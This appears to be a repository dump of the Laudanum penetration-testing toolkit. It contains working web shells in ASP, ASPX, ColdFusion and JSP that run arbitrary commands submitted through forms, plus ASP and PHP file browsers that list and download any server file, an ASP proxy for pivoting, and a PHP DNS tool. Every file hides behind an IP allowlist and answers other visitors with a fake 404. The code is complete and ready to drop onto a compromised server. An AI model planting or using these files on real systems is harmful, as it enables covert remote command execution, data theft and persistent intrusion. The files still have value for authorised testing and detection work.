' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 34 | ' *** GNU General Public License for more details. 35 | ' *** 36 | ' *** You can get a copy of the GNU General Public License from this 37 | ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 38 | ' *** You can also write to the Free Software Foundation, Inc., Temple 39 | ' *** Place - Suite Boston, MA USA. 40 | ' *** 41 | ' ***************************************************************************** */ 42 | 43 | ' ***************** Config entries below *********************** 44 | 45 | ' Define variables 46 | Dim allowedIPs 47 | Dim allowed 48 | Dim filepath 49 | Dim file 50 | Dim stream 51 | Dim path 52 | Dim i 53 | Dim fso 54 | Dim folder 55 | Dim list 56 | Dim temppath 57 | 58 | ' IPs are enterable as individual addresses TODO: add CIDR support 59 | allowedIPs = "192.168.0.1,127.0.0.1,::1" 60 | ' Just in cace you added a space in the line above 61 | allowedIPs = replace(allowedIPS," ","") 62 | 'turn it into an array 63 | allowedIPs = split(allowedIPS,",") ' 64 | ' make sure the ip is allowed 65 | allowed = 0 66 | for i = lbound(allowedIPs) to ubound(allowedIPs) 67 | if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then 68 | allowed = 1 69 | exit for 70 | end if 71 | next 72 | ' send a 404 if the IP Address is not allowed 73 | if allowed = 0 then 74 | Response.Status = "404 File Not Found" 75 | Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) 76 | Response.End 77 | end if 78 | 79 | ' create file object for use everywhere 80 | set fso = CreateObject("Scripting.FileSystemObject") 81 | 82 | ' download a file if selected 83 | filepath = trim(Request.QueryString("file")) 84 | 'validate file 85 | if len(filepath) > 0 then 86 | if fso.FileExists(filepath) then 87 | 'valid file 88 | 89 | Set file = fso.GetFile(filepath) 90 | Response.AddHeader "Content-Disposition", "attachment; filename=" & file.Name 91 | 'Response.AddHeader "Content-Length", file.Size 92 | Response.ContentType = "application/octet-stream" 93 | set stream = Server.CreateObject("ADODB.Stream") 94 | stream.Open 95 | stream.Type = 1 96 | Response.Charset = "UTF-8" 97 | stream.LoadFromFile(file.Path) 98 | ' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb. 99 | Response.BinaryWrite(stream.Read) 100 | stream.Close 101 | set stream = Nothing 102 | set file = Nothing 103 | Response.End 104 | end if 105 | end if 106 | 107 | ' begin rendering the page 108 | %> 109 | 110 | 111 | Laudanum ASP File Browser 112 | 113 | 114 | 115 |

Laudanum File Browser 0.1

116 | 117 | <% 118 | ' get the path to work with, if it isn't set or valid then start with the web root 119 | ' goofy if statement is used since vbscript doesn't use short-curcuit logic 120 | path = trim(Request.QueryString("path")) 121 | if len(path) = 0 then 122 | path = fso.GetFolder(Server.MapPath("\")) 123 | elseif not fso.FolderExists(path) then 124 | path = fso.GetFolder(Server.MapPath("\")) 125 | end if 126 | 127 | set folder = fso.GetFolder(path) 128 | 129 | ' Special locations, webroot and drives 130 | %>Other Locations: <% 131 | for each i in fso.Drives 132 | if i.IsReady then 133 | %><%=i.DriveLetter%>:  <% 134 | end if 135 | next 136 | %>">web root
<% 137 | 138 | ' Information on folder 139 | %>

Listing of: <% 140 | list = split(folder.path, "\") 141 | temppath = "" 142 | for each i in list 143 | temppath = temppath & i & "\" 144 | %><%=i%>\ <% 145 | next 146 | %>

<% 147 | 148 | ' build table for listing 149 | %> 150 | <% 151 | ' Parent Path if it exists 152 | if not folder.IsRootFolder then 153 | %><% 154 | end if 155 | 156 | ' Get the folders 157 | set list = folder.SubFolders 158 | for each i in list 159 | %><% 160 | next 161 | 162 | ' Get the files 163 | set list = folder.Files 164 | for each i in list 165 | %><% 166 | next 167 | 168 | ' all done 169 | %> 170 |
NameSizeModifiedAccessedCreated
..
<%=i.Name%>\
<%=i.Name%><%=FormatNumber(i.Size, 0)%><%=i.DateLastModified%><%=i.DateLastAccessed%><%=i.DateCreated%>
171 |
172 |
173 | Copyright © 2014, Kevin Johnson and the Laudanum team.
174 | Written by Tim Medin.
175 | Get the latest version at laudanum.secureideas.net. 176 |
177 | 178 | 179 | 180 | -------------------------------------------------------------------------------- /laudanum/asp/proxy.asp: -------------------------------------------------------------------------------- 1 | <%@Language="VBScript"%> 2 | <%Option Explicit%> 3 | <%Response.Buffer = True%> 4 | <% 5 | ' ******************************************************************************* 6 | ' *** 7 | ' *** Laudanum Project 8 | ' *** A Collection of Injectable Files used during a Penetration Test 9 | ' *** 10 | ' *** More information is available at: 11 | ' *** http://laudanum.secureideas.net 12 | ' *** laudanum@secureideas.net 13 | ' *** 14 | ' *** Project Leads: 15 | ' *** Kevin Johnson 17 | ' *** 18 | ' *** Copyright 2014 by Kevin Johnson and the Laudanum Team 19 | ' *** 20 | ' ******************************************************************************** 21 | ' *** 22 | ' *** This file provides access as a proxy. 23 | ' *** Written by Tim Medin 24 | ' *** 25 | ' ******************************************************************************** 26 | ' *** This program is free software; you can redistribute it and/or 27 | ' *** modify it under the terms of the GNU General Public License 28 | ' *** as published by the Free Software Foundation; either version 2 29 | ' *** of the License, or (at your option) any later version. 30 | ' *** 31 | ' *** This program is distributed in the hope that it will be useful, 32 | ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of 33 | ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 34 | ' *** GNU General Public License for more details. 35 | ' *** 36 | ' *** You can get a copy of the GNU General Public License from this 37 | ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 38 | ' *** You can also write to the Free Software Foundation, Inc., Temple 39 | ' *** Place - Suite Boston, MA USA. 40 | ' *** 41 | ' ***************************************************************************** */ 42 | 43 | ' ***************** Config entries below *********************** 44 | 45 | ' Define variables 46 | Dim allowedIPs 47 | Dim allowed 48 | Dim i 49 | Dim s 'generic string, yeah, I know bad, but at this point I just want it to work 50 | Dim urltemp 51 | Dim urlscheme 52 | Dim urlhost 53 | Dim urlport 54 | Dim urlpath 55 | Dim urlfile 56 | Dim urlquery 57 | Dim http 58 | Dim method 59 | Dim contenttype 60 | Dim stream 61 | Dim regex 62 | Dim body 63 | Dim params 64 | 65 | function err_handler() 66 | %> 67 | 68 | 69 | Laudanum ASP Proxy 70 | 71 | 72 |

Fatal Error!

73 | <%=Err.Number%>
74 | <%=Err.Message%>
75 |
76 |
77 | Copyright © 2014, Kevin Johnson and the Laudanum team.
78 | Written by Tim Medin.
79 | Get the latest version at laudanum.secureideas.net. 80 |
81 | 82 | <% 83 | end function 84 | 85 | function CleanQueryString 86 | ' removes laudurl from the querystring 87 | Dim i 88 | Dim j 89 | Dim s 90 | Dim key 91 | Dim q 92 | 93 | 94 | if len(request.querystring) = 0 then 95 | CleanQueryString = "" 96 | exit function 97 | end if 98 | 99 | ' build the request parameters 100 | for i = 1 to request.querystring.count 101 | key = request.querystring.key(i) 102 | 'response.write "
key:" & key 103 | if key = "laudurl" then 104 | ' if the key is laudurl, we need check if there is a ? in the string since 105 | ' it may have its own query string that doesn't get parsed properly. 106 | s = split(request.querystring("laudurl"), "?") 107 | if ubound(s) > lbound(s) then 108 | ' laudurl contains a ?, it must be manually parsed 109 | key = left(s(1), instr(s(1), "=") - 1) 110 | q = q & "&" & key & "=" & mid(s(1), len(key) + 2) 111 | end if 112 | else 113 | for j = 1 to request.querystring(key).count 114 | 'response.write "
-value:" & request.querystring(key)(j) 115 | q = q & "&" & key & "=" & request.querystring(key)(j) 116 | next 117 | end if 118 | next 119 | 120 | if len(q) > 0 then 121 | CleanQueryString = "?" & mid(q, 2) 122 | else 123 | CleanQueryString = "" 124 | end if 125 | end function 126 | 127 | function CleanFormValues() 128 | Dim r 129 | Set r = New RegExp 130 | r.IgnoreCase = true 131 | r.Global = true 132 | 133 | ' remove the laudurl paramater 134 | r.Pattern = "laudurl=[^&]+($|&)" 135 | CleanFormValues = r.Replace(request.form, "") 136 | Set r = nothing 137 | end function 138 | 139 | sub ParseUrl() 140 | ' parses the url into the global variables 141 | Dim urltemp 142 | Dim url 143 | 144 | 'get the url, it may be in the querystring for a get or from a form in a post 145 | url = Request.QueryString("laudurl") 146 | if url = "" then 147 | url = Request.Form("laudurl") 148 | end if 149 | 150 | if url = "" then 151 | urlscheme = "" 152 | urlhost = "" 153 | urlport = "" 154 | urlpath = "" 155 | urlfile = "" 156 | urlquery = "" 157 | exit sub 158 | end if 159 | 160 | ' Parse the url and break it into its components 161 | ' this is done so it can be used to rewrite the page 162 | 163 | ' ensure the url has a scheme, if it doesn't then assume http 164 | if instr(url,"://") = 0 then url = "http://" + url 165 | 166 | ' Get the scheme 167 | urlscheme = split(url, "://")(0) & "://" 168 | 169 | ' urltemp is used to hold the remainder of the url as each portion is parsed 170 | urltemp = mid(url, len(urlscheme) + 1) 171 | 'get the host 172 | if instr(urltemp, "/") = 0 then 173 | ' there is no path so all that is left is the host 174 | urlhost = urltemp 175 | urlport = "" 176 | urlpath = "/" 177 | urlfile = "" 178 | urlport = "" 179 | else 180 | ' there is more that just the hostname remaining 181 | urlhost = left(urltemp, instr(urltemp, "/") - 1) 182 | urltemp = mid(urltemp, len(urlhost) + 1) 183 | 184 | ' is there a port 185 | if instr(urlhost, ":") = 0 then 186 | ' no port 187 | urlport = "" 188 | else 189 | ' there is a port 190 | arr = split(urlhost, ":") 191 | urlhost = arr(0) 192 | urlport = ":" & arr(1) 193 | end if 194 | 195 | ' all that is left is the path and the query 196 | ' is there a query? 197 | if instr(urltemp, "?") = 0 then 198 | ' no query 199 | urlpath = urltemp 200 | 'urlquery = "" 201 | else 202 | 'Response.Write "

" & urltemp & "

" 203 | urlpath = left(urltemp, instr(urltemp, "?") - 1) 204 | 'urlquery = mid(urltemp, instr(urltemp, "?") + 1) 205 | end if 206 | 207 | if right(urlpath, 1) = "/" then 208 | urlfile = "" 209 | else 210 | ' we need to get the path and the file 211 | urltemp = split(urlpath, "/") 212 | urlfile = urltemp(ubound(urltemp)) 213 | urlpath = left(urlpath, len(urlpath) - len(urlfile)) 214 | end if 215 | end if 216 | 217 | urlquery = CleanQueryString 218 | 219 | 'response.write "
scheme: " & urlscheme 220 | 'response.write "
host: " & urlhost 221 | 'response.write "
port: " & urlport 222 | 'response.write "
path: " & urlpath 223 | 'response.write "
file: " & urlfile 224 | 'response.write "
query: " & urlquery 225 | 'response.write "
full: " & FullUrl() 226 | 'response.end 227 | end sub 228 | 229 | function FullUrl() 230 | FullUrl = urlscheme & urlhost & urlport & urlpath & urlfile & urlquery 231 | end function 232 | 233 | sub RewriteHeaders() 234 | Dim i 235 | Dim header 236 | Dim headervalue 237 | Dim regexdomain 238 | Dim regexpath 239 | 240 | ' setup a regular expression to clean the cookie's domain and path 241 | Set regexdomain = New RegExp 242 | regexdomain.IgnoreCase = true 243 | regexdomain.Global = true 244 | ' rewrite images and links - absolute reference 245 | regexdomain.Pattern = "domain=[\S]+" 246 | 247 | Set regexpath = New RegExp 248 | regexpath.IgnoreCase = true 249 | regexpath.Global = true 250 | ' rewrite images and links - absolute reference 251 | regexpath.Pattern = "path=[\S]+" 252 | 253 | ' go through each header 254 | for each i in Split(http.getAllResponseHeaders, vbLf) 255 | ' Break on the \x0a and remove the \x0d if it exists 256 | i = Replace(i, vbCr, "") 257 | ' make sure it is a header and value 258 | if instr(i, ":") > 0 then 259 | ' break the response headers into header and value 260 | header = trim(Left(i, instr(i, ":") - 1)) 261 | header = replace(header, "_", "-") 262 | headervalue = trim(Right(i, len(i) - instr(i, ":"))) 263 | 264 | ' don't add these two header types since they are handled automatically 265 | if lcase(header) <> "content-type" and lcase(header) <> "content-length" and lcase(header) <> "transfer-encoding" then 266 | if lcase(header) = "set-cookie" then 267 | ' strip the domain from the cookie 268 | headervalue = regexdomain.replace(headervalue, "") 269 | ' strip the path from the cookie 270 | headervalue = regexpath.replace(headervalue, "") 271 | headervalue = trim(headervalue) 272 | end if 273 | response.AddHeader header, headervalue 274 | end if 275 | end if 276 | next 277 | 278 | Set regexdomain = nothing 279 | Set regexpath = nothing 280 | end sub 281 | 282 | ' TODO: Add authentication support so it will work behind a proxy 283 | ' IPs are enterable as individual addresses TODO: add CIDR support 284 | allowedIPs = "192.168.0.1,127.0.0.1,::1" 285 | ' Just in cace you added a space in the line above 286 | allowedIPs = replace(allowedIPS," ","") 287 | 'turn it into an array 288 | allowedIPs = split(allowedIPS,",") ' 289 | ' make sure the ip is allowed 290 | ' TODO: change this to 0 for production, it is 1 for testing 291 | allowed = 0 292 | for i = lbound(allowedIPs) to ubound(allowedIPs) 293 | if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then 294 | allowed = 1 295 | exit for 296 | end if 297 | next 298 | ' send a 404 if the IP Address is not allowed 299 | if allowed = 0 then 300 | Response.Status = "404 File Not Found" 301 | Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) 302 | Response.End 303 | end if 304 | 305 | 306 | 'initialize variables 307 | Set http = nothing 308 | Set regex = nothing 309 | Set stream = nothing 310 | 311 | ' Define Constants 312 | const useMSXML2 = 0 313 | const chunkSize = 1048576 ' 1MB 314 | 315 | ' parse the url into its parts 316 | ParseUrl() 317 | 318 | ' check if there is a valid url 319 | if len(FullUrl) = 0 then 320 | ' no url to proxy, give `em the boring default page 321 | 322 | ' Default layout of the page 323 | ' First thing you get when you hit the page without giving it a URL 324 | %> 325 | 326 | 327 | Laudanum ASP Proxy 328 | 333 | 334 | 335 | 336 |

Laudanum ASP Proxy

337 | 338 |
"> 339 | 340 | 341 |
342 |
343 |
344 | Copyright © 2014, Kevin Johnson and the Laudanum team.
345 | Written by Tim Medin.
346 | Get the latest version at laudanum.secureideas.net. 347 |
348 | 349 | <% 350 | 351 | Response.End() 352 | end if 353 | 354 | ' Let's get our Proxy on!!! 355 | ' define the request type 356 | if useMSXML2 = 1 then 357 | Set http = Server.CreateObject("MSXML2.XMLHTTP") 358 | else 359 | Set http = Server.CreateObject("Microsoft.XMLHTTP") 360 | end if 361 | 362 | ' get the request type 363 | method = Request.ServerVariables("REQUEST_METHOD") 364 | 365 | ' setup the request, false means don't send it yet 366 | http.Open method, FullUrl, False 367 | 368 | ' send the request 369 | if method = "POST" then 370 | params = CleanFormValues 371 | http.setRequestHeader "Content-type", "application/x-www-form-urlencoded" 372 | http.setRequestHeader "Content-length", len(params) 373 | http.setRequestHeader "Connection", "close" 374 | http.Send(params) 375 | else 376 | http.Send 377 | end if 378 | 379 | ' Replace the normal headers with the ones from the response 380 | Response.Clear 381 | contenttype = http.getResponseHeader("Content-Type") 382 | Response.ContentType = contenttype 383 | 384 | ' rewrite the headers. Takes headers and passes them to new request 385 | RewriteHeaders() 386 | 387 | ' how to respond? is it text or is it something else? 388 | if lcase(left(contenttype, 4)) = "text" then 389 | ' response is text, so we need to rewrite it, but that's later 390 | 391 | 392 | ' do the rewriting 393 | body = http.responseText 394 | 395 | Set regex = New RegExp 396 | regex.IgnoreCase = true 397 | regex.Global = true 398 | 399 | ' rewrite images and links - absolute reference 400 | s = urlscheme & urlhost & urlport 401 | regex.Pattern = "((src|href).?=.?['""])(\/[^'""]+['""])" 402 | body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3") 403 | 404 | ' rewrite images and links - full reference 405 | regex.Pattern = "((src|href).?=.?['""])(http[^'""]+['""])" 406 | body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=$3") 407 | 408 | ' rewrite images and links - absolute reference 409 | s = urlscheme & urlhost & urlport & urlpath 410 | regex.Pattern = "((src|href).?=.?['""])([^\/][^'""]+['""])" 411 | body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3") 412 | 413 | 414 | ' rewrite forms - absolute reference 415 | s = urlscheme & urlhost & urlport 416 | regex.Pattern = "(\]+action.?=.?['""])(\/[^'""]+)(['""][^\>]*[\>])" 417 | body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3") 418 | 419 | ' rewrite forms - full reference 420 | regex.Pattern = "(\]+action.?=.?['""])(http[^'""]+)(['""][^\>]*[\>])" 421 | body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3") 422 | 423 | ' rewrite forms - absolute reference 424 | s = urlscheme & urlhost & urlport & urlpath 425 | regex.Pattern = "(\]+action.?=.?['""])([^\/][^'""]+)(['""][^\>]*[\>])" 426 | body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3") 427 | 428 | Response.Write(body) 429 | 430 | Set regex = nothing 431 | else 432 | ' some sort of binary response, so stream it 433 | Set stream = nothing 434 | Set stream = Server.CreateObject("ADODB.Stream") 435 | stream.Type = 1 'Binary 436 | stream.Open 437 | stream.Write http.responseBody 438 | stream.Position = 0 439 | 440 | For i = 0 to stream.Size \ chunkSize 441 | Response.BinaryWrite(stream.Read(chunkSize)) 442 | next 443 | Set stream = nothing 444 | end if 445 | 446 | Set http = nothing 447 | 448 | Response.End 449 | 450 | :HandleError 451 | err_handler 452 | 453 | %> 454 | 455 | -------------------------------------------------------------------------------- /laudanum/asp/shell.asp: -------------------------------------------------------------------------------- 1 | <% 2 | ' ******************************************************************************* 3 | ' *** 4 | ' *** Laudanum Project 5 | ' *** A Collection of Injectable Files used during a Penetration Test 6 | ' *** 7 | ' *** More information is available at: 8 | ' *** http://laudanum.secureideas.net 9 | ' *** laudanum@secureideas.net 10 | ' *** 11 | ' *** Project Leads: 12 | ' *** Kevin Johnson 14 | ' *** 15 | ' *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | ' *** 17 | ' ******************************************************************************** 18 | ' *** 19 | ' *** Updated and fixed by Robin Wood 20 | ' *** Updated and fixed by Tim Medin "1.2.3.4" then 47 | response.Status="404 Page Not Found" 48 | response.Write(response.Status) 49 | response.End 50 | end if 51 | 52 | if Request.Form("submit") <> "" then 53 | Dim wshell, intReturn, strPResult 54 | cmd = Request.Form("cmd") 55 | Response.Write ("Running command: " & cmd & "
") 56 | set wshell = CreateObject("WScript.Shell") 57 | Set objCmd = wShell.Exec(cmd) 58 | strPResult = objCmd.StdOut.Readall() 59 | 60 | response.write "
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
" 61 | 62 | set wshell = nothing 63 | end if 64 | 65 | %> 66 | 67 | Laundanum ASP Shell 68 | 69 |
70 | Command:
71 | 72 |

Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done. 73 |

Example command to do a directory listing:
74 | %ComSpec% /c dir 75 |

76 |
77 |
78 | Copyright © 2014, Kevin Johnson and the Laudanum team.
79 | Written by Tim Medin.
80 | Get the latest version at laudanum.secureideas.net. 81 |
82 | 83 | 84 | -------------------------------------------------------------------------------- /laudanum/aspx/shell.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#"%> 2 | <%@ Import Namespace="System" %> 3 | 4 | 103 | 104 | Laundanum ASPX Shell 105 | 106 | 107 |
108 | cmd /c 109 |
110 | STDOUT:
111 |
<% = stdout.Replace("<", "<") %>
112 |
113 |
114 |
115 | STDERR:
116 |
<% = stderr.Replace("<", "<") %>
117 | 118 | 119 |
120 | 121 |
122 |
123 | Copyright © 2014, Kevin Johnson and the Laudanum team.
124 | Written by Tim Medin.
125 | Get the latest version at laudanum.secureideas.net. 126 |
127 | 128 | 129 | 130 | -------------------------------------------------------------------------------- /laudanum/cfm/shell.cfm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | Laudanum Coldfusion Shell 65 | 66 |
67 | 68 | Executable: For Windows use: cmd.exe or the full path to cmd.exe
69 | Arguments: For Windows use: /c command
70 | 71 | Executable:
72 | Arguments:
73 |
74 | 75 | 76 | 77 |
78 | 79 | 80 | 81 | 82 | 83 |
 84 |     
 85 |     #Replace(foo, "<", "<", "All")#
 86 |     
87 |
88 | 89 | Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware. 90 | 91 |
92 |
93 | Copyright © 2014, Kevin Johnson and the Laudanum team.
94 | Written by Tim Medin.
95 | Bug fixes by Matt Presson
96 | Get the latest version at laudanum.secureideas.net. 97 |
98 | 99 | 100 | -------------------------------------------------------------------------------- /laudanum/jsp/cmd.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jbarcia/Web-Shells/599cae3d6c134e98d7f7384ba3e88a5114cf4c88/laudanum/jsp/cmd.war -------------------------------------------------------------------------------- /laudanum/jsp/makewar.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | jar -cvf cmd.war warfiles/* 4 | -------------------------------------------------------------------------------- /laudanum/jsp/warfiles/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Created-By: 1.6.0_10 (Sun Microsystems Inc.) 3 | 4 | -------------------------------------------------------------------------------- /laudanum/jsp/warfiles/WEB-INF/web.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | Command 9 | /cmd.jsp 10 | 11 | 12 | -------------------------------------------------------------------------------- /laudanum/jsp/warfiles/cmd.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.util.*,java.io.*"%> 2 | <% 3 | 4 | if (request.getRemoteAddr() != "4.4.4.4") { 5 | response.sendError(HttpServletResponse.SC_NOT_FOUND) 6 | return; 7 | } 8 | 9 | %> 10 | 11 | Laudanum JSP Shell 12 | 13 | Commands with JSP 14 |
15 | 16 |
17 | If you use this against a Windows box you may need to prefix your command with cmd.exe /c 18 |
19 |
20 | <%
21 | if (request.getParameter("cmd") != null) {
22 | out.println("Command: " + request.getParameter("cmd") + "
"); 23 | Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); 24 | OutputStream os = p.getOutputStream(); 25 | InputStream in = p.getInputStream(); 26 | DataInputStream dis = new DataInputStream(in); 27 | String disr = dis.readLine(); 28 | while ( disr != null ) { 29 | out.println(disr); 30 | disr = dis.readLine(); 31 | } 32 | } 33 | %> 34 |
35 |
36 |
37 | Copyright © 2014, Kevin Johnson and the Laudanum team.
38 | Written by Tim Medin.
39 | Get the latest version at laudanum.secureideas.net. 40 |
41 | 42 | -------------------------------------------------------------------------------- /laudanum/php/dns.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides access to DNS on the system. 20 | *** Written by Tim Medin 21 | *** 22 | ******************************************************************************** 23 | *** This program is free software; you can redistribute it and/or 24 | *** modify it under the terms of the GNU General Public License 25 | *** as published by the Free Software Foundation; either version 2 26 | *** of the License, or (at your option) any later version. 27 | *** 28 | *** This program is distributed in the hope that it will be useful, 29 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 30 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 31 | *** GNU General Public License for more details. 32 | *** 33 | *** You can get a copy of the GNU General Public License from this 34 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 35 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 36 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 37 | *** 38 | ***************************************************************************** */ 39 | 40 | // ***************** Config entries below *********************** 41 | 42 | // IPs are enterable as individual addresses TODO: add CIDR support 43 | $allowedIPs = array("19.168.2.16", "192.168.1.100"); 44 | 45 | # *********** No editable content below this line ************** 46 | 47 | $allowed = 0; 48 | foreach ($allowedIPs as $IP) { 49 | if ($_SERVER["REMOTE_ADDR"] == $IP) 50 | $allowed = 1; 51 | } 52 | 53 | if ($allowed == 0) { 54 | header("HTTP/1.0 404 Not Found"); 55 | die(); 56 | } 57 | 58 | 59 | 60 | /* This error handler will turn all notices, warnings, and errors into fatal 61 | * errors, unless they have been suppressed with the @-operator. */ 62 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 63 | /* The @-opertor (used with chdir() below) temporarely makes 64 | * error_reporting() return zero, and we don't want to die in that case. 65 | * We do note the error in the output, though. */ 66 | if (error_reporting() == 0) { 67 | $_SESSION['output'] .= $errstr . "\n"; 68 | } else { 69 | die(' 71 | 72 | 73 | Laudanum PHP DNS Access 74 | 75 | 76 |

Fatal Error!

77 |

' . $errstr . '

78 |

in ' . $errfile . ', line ' . $errline . '.

79 | 80 |
81 |
82 | Copyright © 2014, Kevin Johnson and the Laudanum team.
83 | Written by Tim Medin.
84 | Get the latest version at laudanum.secureideas.net. 85 |
86 | 87 | 88 | '); 89 | } 90 | } 91 | 92 | set_error_handler('error_handler'); 93 | 94 | 95 | /* Initialize some variables we need again and again. */ 96 | $query = isset($_POST['query']) ? $_POST['query'] : ''; 97 | $type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; 98 | ?> 99 | 101 | 102 | 103 | Laudanum PHP DNS Access 104 | 105 | 106 | 111 | 112 | 113 | 114 |

DNS Query 0.1

115 |
116 |
117 | DNS Lookup: 118 |

Query: 119 | Type: 134 | 135 |

136 |
137 | 138 | 139 | "; 144 | echo "Result = "; 145 | print_r($result); 146 | echo "Auth NS = "; 147 | print_r($authns); 148 | echo "Additional = "; 149 | print_r($addtl); 150 | echo ""; 151 | } 152 | ?> 153 |
154 |
155 | Copyright © 2014, Kevin Johnson and the Laudanum team.
156 | Written by Tim Medin.
157 | Get the latest version at laudanum.secureideas.net. 158 |
159 | 160 | 161 | 162 | -------------------------------------------------------------------------------- /laudanum/php/file.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file allows browsing of the file system. 20 | *** Written by Tim Medin 21 | *** 2013-12-28 Updated by Jason Gillam - fixed parent folder 22 | *** 23 | ******************************************************************************** 24 | *** This program is free software; you can redistribute it and/or 25 | *** modify it under the terms of the GNU General Public License 26 | *** as published by the Free Software Foundation; either version 2 27 | *** of the License, or (at your option) any later version. 28 | *** 29 | *** This program is distributed in the hope that it will be useful, 30 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 31 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 32 | *** GNU General Public License for more details. 33 | *** 34 | *** You can get a copy of the GNU General Public License from this 35 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 36 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 37 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 38 | *** 39 | ***************************************************************************** */ 40 | 41 | // ***************** Config entries below *********************** 42 | 43 | // IPs are enterable as individual addresses TODO: add CIDR support 44 | $allowedIPs = array("192.168.1.1","127.0.0.1"); 45 | 46 | # *********** No editable content below this line ************** 47 | 48 | $allowed = 0; 49 | foreach ($allowedIPs as $IP) { 50 | if ($_SERVER["REMOTE_ADDR"] == $IP) 51 | $allowed = 1; 52 | } 53 | 54 | if ($allowed == 0) { 55 | header("HTTP/1.0 404 Not Found"); 56 | die(); 57 | } 58 | 59 | 60 | 61 | /* This error handler will turn all notices, warnings, and errors into fatal 62 | * errors, unless they have been suppressed with the @-operator. */ 63 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 64 | /* The @-opertor (used with chdir() below) temporarely makes 65 | * error_reporting() return zero, and we don't want to die in that case. 66 | * We do note the error in the output, though. */ 67 | if (error_reporting() == 0) { 68 | $_SESSION['output'] .= $errstr . "\n"; 69 | } else { 70 | die(' 72 | 73 | 74 | Laudanum PHP File Browser 75 | 76 | 77 |

Fatal Error!

78 |

' . $errstr . '

79 |

in ' . $errfile . ', line ' . $errline . '.

80 | 81 |
82 |
83 | Copyright © 2014, Kevin Johnson and the Laudanum team.
84 | Written by Tim Medin.
85 | Get the latest version at laudanum.secureideas.net. 86 |
87 | 88 | 89 | '); 90 | } 91 | } 92 | 93 | set_error_handler('error_handler'); 94 | 95 | 96 | /* Initialize some variables we need again and again. */ 97 | $dir = isset($_GET["dir"]) ? $_GET["dir"] : "."; 98 | $file = isset($_GET["file"]) ? $_GET["file"] : ""; 99 | 100 | if ($file != "") { 101 | if(file_exists($file)) { 102 | 103 | $s = split("/", $file); 104 | $filename = $s[count($s) - 1]; 105 | header("Content-type: application/x-download"); 106 | header("Content-Length: ".filesize($file)); 107 | header("Content-Disposition: attachment; filename=\"".$filename."\""); 108 | readfile($file); 109 | die(); 110 | } 111 | } 112 | ?> 113 | 115 | 116 | 117 | Laudanum File Browser 118 | 119 | 120 | 122 | 123 | 124 | 125 |

Laudanum File Browser 0.1

126 | Home
127 | 128 | Directory listing of / "; 137 | $breadcrumb = '/'; 138 | foreach ($dirs as $d) { 139 | if ($d != '') { 140 | $breadcrumb .= $d . "/"; 141 | echo "$d/ "; 142 | } 143 | } 144 | echo ""; 145 | 146 | // translate .. to a real dir 147 | $parentdir = ""; 148 | for ($i = 0; $i < count($dirs) - 2; $i++) { 149 | $parentdir .= $dirs[$i] . "/"; 150 | } 151 | 152 | echo ""; 153 | echo ""; 154 | echo ""; 155 | 156 | //get listing, separate into directories and files 157 | $listingfiles = array(); 158 | $listingdirs = array(); 159 | 160 | if ($handle = @opendir($curdir)) { 161 | while ($o = readdir($handle)) { 162 | if ($o == "." || $o == "..") continue; 163 | if (@filetype($curdir . $o) == "dir") { 164 | $listingdirs[] = $o . "/"; 165 | } 166 | else { 167 | $listingfiles[] = $o; 168 | } 169 | } 170 | 171 | @natcasesort($listingdirs); 172 | @natcasesort($listingfiles); 173 | 174 | //display directories 175 | foreach ($listingdirs as $f) { 176 | echo ""; 177 | } 178 | 179 | //display files 180 | foreach ($listingfiles as $f) { 181 | echo ""; 182 | } 183 | } 